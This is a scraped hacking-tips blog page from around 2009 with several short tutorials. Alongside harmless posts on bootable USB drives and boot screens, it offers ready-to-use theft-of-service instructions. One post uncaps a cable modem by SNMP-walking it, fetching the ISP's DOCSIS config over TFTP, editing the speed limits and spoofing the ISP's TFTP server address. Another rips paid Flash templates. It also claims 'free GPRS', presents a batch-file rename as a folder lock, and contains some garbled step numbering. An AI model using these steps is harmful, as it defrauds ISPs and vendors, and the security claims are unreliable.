<li><span style="font-size: x-small;"> Real profiles of real people</span></li>
<li><span style="font-size: x-small;"> Track your community growth as readers invite their friends</span></li>
<li><span style="font-size: x-small;"> Communicate with your community and learn what they like</span></li>
</ul><span style="font-size: x-small;"><span style="font-weight: bold;"> Increase Page Views</span><br />
</span><br />
<ul><li><span style="font-size: x-small;"> Gain traffic from Facebook through your members news feed</span></li>
<li><span style="font-size: x-small;"> Engage readers and raise page views with applications such as post navigator and blog search</span></li>
<li><span style="font-size: x-small;"> Track your traffic growth through simple analytics tools</span></li>
</ul><span style="font-size: x-small;"><span style="font-weight: bold;"> Communicate With Your Readers</span><br />
</span><br />
<ul><li><span style="font-size: x-small;"> Share your tweets with your readers in real time</span></li>
<li><span style="font-size: x-small;"> Send short alerts to your readers with each entry to your blog</span></li>
<li><span style="font-size: x-small;"> Direct channel to your Facebook community members</span></li>
</ul><span style="font-size: x-small;"><span style="font-weight: bold;"> Power Tools</span><br />
</span><br />
<ul><li><span style="font-size: x-small;"> Discover a growing range of applications to enrich your readers experience</span></li>
<li><span style="font-size: x-small;"> Full tracking and management system for each application and effectiveness to your blog</span></li>
<li><span style="font-size: x-small;"> Add and remove applications in just one click</span></li>
</ul><span style="font-size: x-small;">Get your blogger tool bar now and enjoy the difference in your blogging experience.</span><br />
</div></div><h1 style="text-align: justify;"><span style="font-size: x-small;"> </span></h1><h1 style="text-align: justify;">How To Create A Bootable USB Drive From Your Windows CD</h1><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">We have been using CDs and DVDs to install operating systems on our computers for quite some time now. With the ever increasing popularity of netbooks, things are about to change. In such cases, an external optical drive or a USB drive is required.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">There are couple of situations where the use of USB drive brings a certain benefit:</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">- When you are trying to install Windows on a netbook or your optical drive is broken</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">- When you want to create a live USB from an ISO image (requires some extra effort)</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">- Theoretically, the transfer speeds should be better and the installation process is a little faster</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">- You can protect your original install media from wear and tear.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">There are a number of ways to create a bootable USB drive, however most of them require copying files manually – making it prone to mistakes. WinToFlash makes the entire task a lot simpler by the magic of automation.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Download WinToFlash from here. It is a portable application, all you have to do is extract the zip file and you are ready to go. Start WinToFlash, pop in the Windows CD/DVD, plug in the USB flash drive and specify the paths. Click ‘Next’ and sit back and watch WinToFlash create a bootable USB drive from the installation media. This might take some time depending upon the size of the installation media.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">WinToFlash can also be used transfer Preinstalled Environments (PE’s) to a flash drive. Go to the ‘Tasks’ tab and choose the appropriate option you want to use.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Creating a bootable flash drive from an ISO image is a little more involved. WinToFlash doesn’t let you specify an ISO image as the source for Windows file. To get around this limitation, you can do one of the following:</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">- Extract the ISO file. Most modern archiving software can extract files from an ISO image. I used 7-zip.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">- Virtually mount the ISO image (try Virtual CD-ROM control panel) and specify the virtual drive as the Windows file path in WinToFlash.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">The rest of the process remain unchanged and you will get a bootable USB drive after successful completion.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><b>I want to install Linux using a bootable flash drive?</b></span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">As the name suggests WinToFlash only works with Windows installation media. If you want to install Linux using a USB drive we suggest you have a look at UNetbootin. It works well with ISO files and can even download the required files if you don’t currently have them on your computer. You can also use built-in tools included in many distributions these days, if you already have Linux installed on another computer.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><b>How do I check if my computer can boot from USB drive?</b></span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">That is a question I get asked many a times. You can refer to your computer’s manual to check if you are able to boot from a USB drive. If that doesn’t work or you have a custom-built computer than you can always check the BIOS settings to see if there is an option to boot from External drive or USB drive. If there is one, make sure your computer is configured to look for a USB drive before it defaults to boot from the hard disk.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">After you are through with the installation, I would suggest that you move the USB drive option back down the order and protect the BIOS settings with a password to minimize the risk of your computer being compromised.</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="color: #990000; text-align: justify;"><span style="font-size: x-small; font-weight: bold;"> FREE GPRS ON VODAFONE</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Followng are the<b> Settings</b> you require to configure on your Mobile:</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Account Name: Vodafone_gprs</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Homepage: http://live.vodafone.in</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">User Name: (no need)</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Pass: (no need)</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><a href="http://hackernepal.blogspot.com/" id="AdBriteInlineAd_Access" name="AdBriteInlineAd_Access" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: transparent url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x scroll center bottom; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top">Access</a> Point Settings:</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Proxy: Enabled</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Proxy Address: 10.10.1.100</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Proxy Port: 9401</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Data Bearer: Packet Data</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Bearer Settings:</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Packet Data Access Point: portalnmms</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><a href="http://hackernepal.blogspot.com/" id="AdBriteInlineAd_Network" name="AdBriteInlineAd_Network" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: transparent url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x scroll center bottom; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top">Network</a> type: IPV4</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Authentication: normal</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">User Name: (no need)</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Password: (no need)</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">*IF that happen this settings is not <a href="http://hackernepal.blogspot.com/" id="AdBriteInlineAd_working" name="AdBriteInlineAd_working" style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: transparent url(http://files.adbrite.com/mb/images/green-double-underline-006600.gif) repeat-x scroll center bottom; color: #006600; cursor: pointer; margin-bottom: -2px; padding-bottom: 2px; text-decoration: none;" target="_top">working</a> then change the proxy port number to:-</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;">Proxy Port: 9401 </span><br />
</div><div style="text-align: justify;"><span style="font-size: x-small;"><br />
</span><br />
</div><div class="linkwithin_text" id="linkwithin_text_0" style="border: 0pt none; font-weight: bold; margin: 0pt; padding: 20px 0pt 5px; text-align: justify;"><span style="font-size: x-small;">You might also like: </span><br />
</div><div class="linkwithin_posts" style="border: 0pt none; margin: 0pt; padding: 0pt; text-align: justify;"><ul class="linkwithin_textlist" style="margin: 0pt 0pt 0pt 15px; padding: 0pt;"><li style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: transparent none repeat scroll 0% 0%; line-height: 1.2em; list-style-image: none; list-style-position: outside; list-style-type: disc; margin: 0pt; padding: 0pt;"> <span style="font-size: x-small;"><a href="http://www.freehackingarticles.co.cc/2009/08/airtel-hack-2009-for-unlimited-free-sms.html" onmousedown="this.href='http://widget.linkwithin.com/redirect?url=http%3A//www.freehackingarticles.co.cc/2009/08/airtel-hack-2009-for-unlimited-free-sms.html&vars=%5B%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%2054919%2C%200%2C%20%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%208173264%2C%200%2C%208173262%5D&hash=c830c26a8f064f12ce0317d750aec8e5eef50322&ts=' + (new Date()).getTime(); return true;">Airtel Hack 2009 for Unlimited Free SMS</a></span> </li>
<li style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: transparent none repeat scroll 0% 0%; line-height: 1.2em; list-style-image: none; list-style-position: outside; list-style-type: disc; margin: 0pt; padding: 0pt;"> <span style="font-size: x-small;"><a href="http://www.freehackingarticles.co.cc/2009/08/display-your-name-near-to-time-on-xp.html" onmousedown="this.href='http://widget.linkwithin.com/redirect?url=http%3A//www.freehackingarticles.co.cc/2009/08/display-your-name-near-to-time-on-xp.html&vars=%5B%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%2054919%2C%200%2C%20%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%208173264%2C%201%2C%208173241%5D&hash=c23f00d8393ec508628e0edd7c2ba6fcf6ee0b5f&ts=' + (new Date()).getTime(); return true;">Display your name on taskbar in XP</a></span> </li>
<li style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: transparent none repeat scroll 0% 0%; line-height: 1.2em; list-style-image: none; list-style-position: outside; list-style-type: disc; margin: 0pt; padding: 0pt;"> <span style="font-size: x-small;"><a href="http://widget.linkwithin.com/redirect?url=http%3A//www.freehackingarticles.co.cc/2009/08/make-free-calls-to-landline-and-mobile.html&vars=%5B%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%2054919%2C%200%2C%20%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%208173264%2C%202%2C%208173265%5D&hash=481df156001fb45325e28d782c2658f54c0c404f&ts=1255782916826" onmousedown="this.href='http://widget.linkwithin.com/redirect?url=http%3A//www.freehackingarticles.co.cc/2009/08/make-free-calls-to-landline-and-mobile.html&vars=%5B%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%2054919%2C%200%2C%20%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%208173264%2C%202%2C%208173265%5D&hash=481df156001fb45325e28d782c2658f54c0c404f&ts=' + (new Date()).getTime(); return true;">Make FREE Calls to Landline and Mobile phones</a></span> </li>
<li style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: transparent none repeat scroll 0% 0%; line-height: 1.2em; list-style-image: none; list-style-position: outside; list-style-type: disc; margin: 0pt; padding: 0pt;"> <span style="font-size: x-small;"><a href="http://www.freehackingarticles.co.cc/2009/09/how-to-emulate-cell-phone-on-pc-using.html" onmousedown="this.href='http://widget.linkwithin.com/redirect?url=http%3A//www.freehackingarticles.co.cc/2009/09/how-to-emulate-cell-phone-on-pc-using.html&vars=%5B%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%2054919%2C%200%2C%20%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%208173264%2C%203%2C%208708341%5D&hash=8d89cf41333b6aeed61735c140dcc41df3cf31e7&ts=' + (new Date()).getTime(); return true;">How to emulate a cell phone on PC using Windows Mobile 6.5 developer toolkit</a></span> </li>
<li style="-moz-background-clip: -moz-initial; -moz-background-inline-policy: -moz-initial; -moz-background-origin: -moz-initial; background: transparent none repeat scroll 0% 0%; line-height: 1.2em; list-style-image: none; list-style-position: outside; list-style-type: disc; margin: 0pt; padding: 0pt;"> <span style="font-size: x-small;"><a href="http://widget.linkwithin.com/redirect?url=http%3A//www.freehackingarticles.co.cc/2009/08/hide-your-files-in-jpeg.html&vars=%5B%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%2054919%2C%200%2C%20%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%208173264%2C%204%2C%208173252%5D&hash=aa73ad753fd9fefd7f3d24c71c4a759a55d4255b&ts=1255782917892" onmousedown="this.href='http://widget.linkwithin.com/redirect?url=http%3A//www.freehackingarticles.co.cc/2009/08/hide-your-files-in-jpeg.html&vars=%5B%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%2054919%2C%200%2C%20%22http%3A//www.freehackingarticles.co.cc/2009/08/vodafone-hack-for-free-gprs.html%22%2C%208173264%2C%204%2C%208173252%5D&hash=aa73ad753fd9fefd7f3d24c71c4a759a55d4255b&ts=' + (new Date()).getTime(); return true;">Hide Your Files In A JPEG</a> </span></li>
</ul><br />
<br />
<h2><a href="http://hackernepal.blogspot.com/2009/10/how-to-optimize-dsl-cable-connection.html">2. How to Optimize DSL Cable Connection</a></h2><img src="http://i30.tinypic.com/9k9k07.jpg" style="height: 375px; width: 501px;" /><br />
<br />
-First, you need to goto Start, then RUN.<br />
-Type in regedit in the box.<br />
-Next, goto the folder <span style="color: black; font-weight: bold;">HKEY_LOCAL_MACHINE\System\CurrentControlSet\VxD\MSTCP</span><br />
-Now, find the string <span style="font-weight: bold;">DefaultRcvWindow</span> .<br />
-Now, edit the number to <span style="font-weight: bold;">64240</span> then restart your computer. There you go.<br />
-High speed cable modem now with out dloading a program.<br />
-Original value is 373360<br />
<br />
Enjoy! <br />
<br />
<br />
<h2 class="post-title">3. How to Lock the folders</h2>You can lock and unlock your folder with this simple trick !<br />
<span style="color: red; font-weight: bold;">Procedure :<br />
</span>1. Make a folder on the desktop and name it as “folder”<br />
2. Now, open notepad and write <span style="color: red;">ren folder folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} </span>and now (Notepad Menu) File>save as.<br />
3. In the ’save as’ name it as <span style="color: #009900; font-weight: bold;">lock.bat</span> and click save ! (Save it on Desktop)<br />
4. Now, again open notepad again and write <span style="color: red;">ren</span> <span style="color: red;">folder.{21EC2020-3AEA-1069-A2DD-08002B30309D} folder </span>and now (Notepad Menu) File>save as.<br />
5. In the ’save as’ name it as <span style="color: #009900; font-weight: bold;">key.bat</span> and click save ! (Save it on Desktop)<br />
6. Now, double click <span style="color: #009900; font-weight: bold;">lock.bat </span>to lock the folder and now if you open your folder, control panel will open up !<br />
7. Now, double click <span style="color: #009900; font-weight: bold;">key.bat </span>to open the folder and now if you open your folder, you can access your data inside the folder again !<br />
8. Lock your folder and hide the <span style="color: #009900; font-weight: bold;">key.bat </span>somewhere else on your hard disk !<br />
9. Whenever you want to open your folder just paste the <span style="color: #009900; font-weight: bold;">key.bat </span>on desktop and open your folder using it !<br />
</div><div class="linkwithin_posts" style="border: 0pt none; margin: 0pt; padding: 0pt; text-align: justify;"><br />
</div><div class="linkwithin_posts" style="border: 0pt none; margin: 0pt; padding: 0pt; text-align: justify;"><br />
</div><div class="linkwithin_posts" style="border: 0pt none; margin: 0pt; padding: 0pt; text-align: justify;"><br />
</div><div class="linkwithin_posts" style="border: 0pt none; margin: 0pt; padding: 0pt; text-align: justify;"><h2><a href="http://hackernepal.blogspot.com/2009/10/increase-your-download-speed-from.html">4.increase your download speed from 64kbps to 2mbps</a></h2><b>hack Your Modem and Increase Your Download Speed from 64Kbps to any Speed You Wish<br />
<br />
Most of us will be feeling that the surfing speed which is allocated by our ISP is not enough. People with 64Kbps will think 128Kbps will be cool speed. People with 128Kbps will think 256Kbps will be cool and so on<br />
<br />
This tutorial will teach you how to increase your 64Kbps link to 512Kbps or what ever speed you like.<br />
<br />
It is very much possible to do this. With a bit of luck if your Cable Internet Service Provider are very uneducated on how this very new technology works and leave some key loopholes open for you to grab vital information on how to accomplish this task. But this tutorial will no guarantee you 100% success.<br />
<br />
Okay here we go. I'm going to try to explain you as best as I can to accomplish re-configuring your SB5100, SB4100 or SB3100 cable modem<br />
<br />
Theory of cable modem working<br />
<br />
All the cable modems when it boots up it will search for an "Image file" where in all configuration like your upload speed limit and download speed limit is defined. This "Image file" is stored in ISP`s TFTP server. Modem will be pre-configured with the ISP`s TFTP server IP address and the Image file name to be downloaded. When the modem boots up it query TFTP server and download Image file from TFTP server according to this our speed limits will be set.<br />
<br />
Our Mission<br />
<br />
Get this Image file from ISP`s TFTP server, reconfigure it according to our need and force our modem to download this file from our Computer rather than downloading it from our ISP`s TFTP server.<br />
<br />
Steps to accomplish<br />
<br />
1). Get cable modems MAC address<br />
2). Get your ISPs TFTP server IP address<br />
3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.<br />
4). Download Image file from ISP`s TFTP server.<br />
5). Decrypt the Image file which you downloaded from ISP`s TFTP server<br />
6). Modify the Image file<br />
7). Encrypt the modified Image file<br />
Cool. Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)<br />
9). Host TFTP server in your computer<br />
10). Put Image file in the base directory of your TFTP<br />
11). Restart your modem<br />
12). Changer your PC's IP back as given by ISP<br />
13). Done. Start surfing with your new speed<br />
<br />
<br />
1). Get cable modems MAC address<br />
<br />
You can either look at the back of the modem to get this MAC Address or you can logon to your Cable modem with your Web Browser hxxp://192.168.100.1/ . This is internal HTML pages stored within your DOCsis cable modem (SB5100, SB4100 and SB3100) that gives you even more vital information on configuration. Unless it is turned off by your ISP. This feature might be totally turned off by your ISP.<br />
<br />
2). Get your ISPs TFTP server IP address<br />
3). Get name and path of the "configuration file" or Image file stored in the ISP`s TFTP server.<br />
<br />
For getting this vital information you have to do an SNMP walk over your modem. For doing this you can use any one of the tools below<br />
<br />
a) There's a program called QUERY.EXE from Weird Solutions which is a BOOTP packet request program that will tell you everything you need to know, without all these extra steps. It will display the Image Filename, TFTP server address, which is really all you need to get started. To use this BOOTP QUERY tool, you need the MAC address of your cable modem<br />
<br />
Or<br />
<br />
Experts can use Solarwinds SNMP program<br />
<br />
Or<br />
<br />
c) Beginners can use DOCSIS Diagnosis utility<br />
<br />
Or<br />
<br />
d) Beginners can use SNMPWALK Tool<br />
<br />
use command "snmpwalk 192.168.100.1 public"<br />
<br />
NOTE: Use modem's IP address as "192.168.100.1" (SB5100, SB4100 and SB3100) when it asked to provide by any of the above tools. SNMP community is "Public"<br />
<br />
Using the above tools you will get the information of your ISP`s TFTP server IP and the name of your "Image file" stored in that TFTP server<br />
All your vital information is stored in this file, One of which is the MaxRateDown 2621440; MaxRateUp 393216;. (This was my ISP settings. Which you can see is similar to what speed I was getting. 40KB/s up and 250 KB/s down)<br />
<br />
Among these, the one we need are:<br />
Configuration TFTP Server = 194.*.*..90 (replace this with yours throughout in the doc)<br />
Configuration filename = isrr.bin (replace this with yours throughout in the doc)<br />
And<br />
IP fragments created = 0<br />
IP address.10.xxx.xxx.xxx = 10.xxx.xxx.xxx<br />
IP address.192.168.100.1 = 192.168.100.1 (the IP address of the cable modem, (replace this with yours throughout in the doc)<br />
IP-to-If-index.10.xxx.xxx.xxx = 2<br />
<br />
Suggestion: You can do this step by sniffing the modem i.e. "192.168.100.1" when modem boots up. I never tried this method. Try your luck.<br />
<br />
<br />
4). Download Image file from ISP`s TFTP server.<br />
<br />
For doing this got to your command prompt and use below commands with out quotes and bracket.<br />
<br />
<br />
"C:tftp -i <isp`s> GET <img src="http://tricksoninternet.blogspot.com/2009/10/post-create.do" /> <local>"<br />
<br />
Okay now you got Image file from your ISP`s TFTP server.<br />
<br />
<br />
5). Decrypt the Image file which you downloaded from ISP`s TFTP server<br />
6). Modify the Image file<br />
7). Encrypt the modified Image file<br />
<br />
Use docsis tool which you can download from<br />
<br />
<br />
Code:<br />
<br />
http://sourceforge.net/projects/docsis<br />
<br />
<br />
<br />
using this program you can decrypt image file change the upload speed and download speed ,save it and encrypt back. Rename this newly created file same as your original image file.<br />
<br />
<br />
Cool. Change your computer's TCP configuration same as ISP`s TFTP server (i.e. IP address same as ISP`s TFTP server)<br />
<br />
Go to my network place and right click ->properties<br />
Select your LAN Card right click ->property->Internet Protocol (TCP-IP) double click on it and change it to as following values<br />
Configure your TPC's TCP settings as below<br />
IP: 194.*.*.90 (replace with the ISP's TFTP server)<br />
Netmask: 255.255.255.0<br />
Gateway: 192.168.100.1 (replace with your cable modem's IP address)<br />
<br />
Note: Gateway should be 192.168.100.1 then only your modem can communicate with computer.<br />
<br />
<br />
9). Host TFTP server in your computer<br />
10). Put Image file in the base directory of your TFTP<br />
11). Restart your modem<br />
<br />
Download TFTP Server software and host TFTP server in your computer<br />
You can download TFTP server from:<br />
<br />
<br />
Code:<br />
<br />
ftp://ftp.ida.net/pub/wireless/tftpd32.exe<br />
<br />
<br />
<br />
Start TFTPD32 server. Go to Settings and set the Security to None. Increase the timeout to 20secs and the Max Retransmit to 6. Choose to translate UNIX filenames. Make sure it's base directory point to where the isrr.bin is (i.e. the image file which you modified). If you need to replicate a directory pathname along with the image file, then make a directory from root that corresponds to the image file pathname.<br />
<br />
Restart your modem, and AS SOON as the SEND light goes solid, you should see a receive on your TFTP server i.e. your PC<br />
<br />
<br />
12). Changer your PC's IP back as given by ISP<br />
13). OOPS Done. Start surfing with your new speed<br />
<br />
Now you change your TCP settings of your PC back to normal as given by ISP. (I.e. Put your original IP address and gateway)<br />
<br />
Oops you hacked your modem. Test out by downloading some files using DAP (Download accelerator plus)<br />
<br />
Note: This speed will remain same until you restart your cable modem. So each time you reboot your modem you have to follow the steps 8,9,10,11 and 12<br />
<br />
good luck.......</local></isp`s></b> <br />
<br />
<script type="text/javascript">
<!--
ch_client = "eblogtemplates";
ch_type = "rpu";
ch_noprice = "1";
ch_shufflequeries = 1;
ch_width = 468;
ch_height = 90;
ch_color_title = "2277DD";
ch_non_contextual = 1;
ch_nosearch = 1 ;
ch_font_title = "Arial";
ch_font_text = "Arial";
ch_sid = "langit-template";
var ch_queries = new Array( );
var ch_selected=Math.floor((Math.random()*ch_queries.length));
if ( ch_selected < ch_queries.length ) {
ch_query = ch_queries[ch_selected];
}
//-->
</script> <script src="http://scripts.chitika.net/eminimalls/mm.js" type="text/javascript">
</script><iframe allowtransparency="true" frameborder="0" height="90" hspace="0" marginheight="0" marginwidth="0" name="ch_ad438" scrolling="no" src="http://mm.chitika.net/minimall?w=468&h=90&client=eblogtemplates&noctxt=1&sid=langit-template&url=http%3A//hackernepal.blogspot.com/2009/10/increase-your-download-speed-from.html&type=rpu&nosearch=1&noprice=1&cl_title=2277DD&fn_title=Arial&fn_text=Arial&ref=http%3A//hackernepal.blogspot.com/&shqueries=1&cb=438" vspace="0" width="468"></iframe> <br />
<br />
<div class="metadata1"></div><script type="text/javascript">
<!--
google_ad_client="pub-3696876220666555";
google_ad_host="pub-1556223355139109";
google_ad_width=468;
google_ad_height=15;
google_ad_format="468x15_0ads_al_s";
google_color_border="FFFFFF";
google_color_bg="FFFFFF";
google_color_link="AADD99";
google_color_url="CCCCCC";
google_color_text="CCCCCC";
//-->
</script> <script src="http://pagead2.googlesyndication.com/pagead/show_ads.js" type="text/javascript">
</script><script src="http://googleads.g.doubleclick.net/pagead/test_domain.js">
</script><script>
google_protectAndRun("ads_core.google_render_ad", google_handleError, google_render_ad);
</script><iframe allowtransparency="true" frameborder="0" height="15" hspace="0" marginheight="0" marginwidth="0" name="google_ads_frame" scrolling="no" src="http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3696876220666555&format=468x15_0ads_al_s&output=html&h=15&w=468&lmt=1255783003&host=pub-1556223355139109&ea=0&color_bg=FFFFFF&color_border=FFFFFF&color_link=AADD99&color_text=CCCCCC&color_url=CCCCCC&flash=10.0.12&url=http%3A%2F%2Fhackernepal.blogspot.com%2F2009%2F10%2Fincrease-your-download-speed-from.html&ref=http%3A%2F%2Fhackernepal.blogspot.com%2F&dt=1255783030261&correlator=1255783030265&frm=0&ga_vid=1261546331.1255783030&ga_sid=1255783030&ga_hid=1683631735&ga_fc=0&u_tz=-420&u_his=2&u_java=1&u_h=768&u_w=1024&u_ah=722&u_aw=1024&u_cd=32&u_nplug=20&u_nmime=107&biw=1007&bih=480&fu=0&ifi=1&dtd=19" vspace="0" width="468"></iframe><br />
<br />
<br />
<br />
<br />
<h2><a href="http://hackernepal.blogspot.com/2009/10/how-to-change-your-boot-screen.html">5. How to change your boot screen.</a></h2>How to change your boot screen.<br />
THIS HACK CAN MAKE YOUR COMPUTER TO STOP BOOTING. BE CAREFUL AND<br />
MAKE A BACKUPFILE OF THE BOOT IMAGE YOU ALLREADY HAVE BEFORE<br />
CHANGING ANYTHING.<br />
The amateur way:<br />
Google windows themes and look for anyone you like.<br />
Manually:<br />
There are two types of BOOT screens. One for SP1 and one for SP2. Check what you have<br />
before beginning. The SP1 files look is named ntoskrnlSP.exe and the SP2 files is named<br />
ntoskrnl.exe. Hope you see the difference.<br />
This is your current boot screen:<br />
http://www.moviereel.net/hbh/fusion_images/Old%20Boot%20Screen.jpg Right?<br />
You can find it in: C:\Windows\System32<br />
You cannot just replace it with the new one. You need to first start windows in safe-mode and<br />
THEN replace the file. Don't firget to backup the original BOOT screen before replacing it.<br />
This is how it can look afterwards:<br />
http://www.moviereel.net/hbh/fusion_images/New%20Boot%20Screen.jpg<br />
Just google BOOT Screens and pick the one you like.<br />
<br />
Sample dynamic flash template from TM website<br />
Sothink SWF Decompiler<br />
Macromedia Flash<br />
Yourself<br />
<br />
<br />
<h2><a href="http://hackernepal.blogspot.com/2009/10/how-to-rip-dynamic-flash-template.html">5.-[ How to rip Dynamic Flash Template ]-</a></h2><span style="font-size: x-small;">1. browse or search your favorite dynamic flash template in TM website. If you got one... click the "view" link and new window will open with dynamic flash.. loading...</span><br />
<span style="font-size: x-small;"><br />
</span><br />
<span style="font-size: x-small;">2. If the movie fully loaded, click View -> Source in your browser to bring the source code of the current page and in the source code, search for "IFRAME" and you will see the iframe page. In this example were going to try the 7045 dynamic template. get the URL(ex.</span><br />
<span style="font-size: x-small;">http://images.templatemonster.com/screenshots/7000/7045.html) then paste it to your browser... easy eh? wait! dont be to excited... erase the .html and change it to swf then press enter then you'll see the flash movie again icon_smile.gif.</span><br />
<span style="font-size: x-small;"><br />
</span><br />
<span style="font-size: x-small;">3. copy the URL and download that SWF file.. use your favorite download manager.. mine I used flashget icon_smile.gif NOTE: dont close the browser we may need that later on.</span><br />
<span style="font-size: x-small;"><br />
</span><br />
<span style="font-size: x-small;">4. open your Sothink SWF decompiler... click "Quick Open" then browse where you download your SWF/movie file. Click Export FLA to export your SWF to FLA, in short, save it as FLA icon_smile.gif</span><br />
<span style="font-size: x-small;"><br />
</span><br />
<span style="font-size: x-small;">5. Open your Macromedia FLash and open the saved FLA file. press Control+Enter or publish the file... then wallah! the output window will come up with "Error opening URL blah blah blah..." dont panic, that error will help you where to get the remaining files.</span><br />
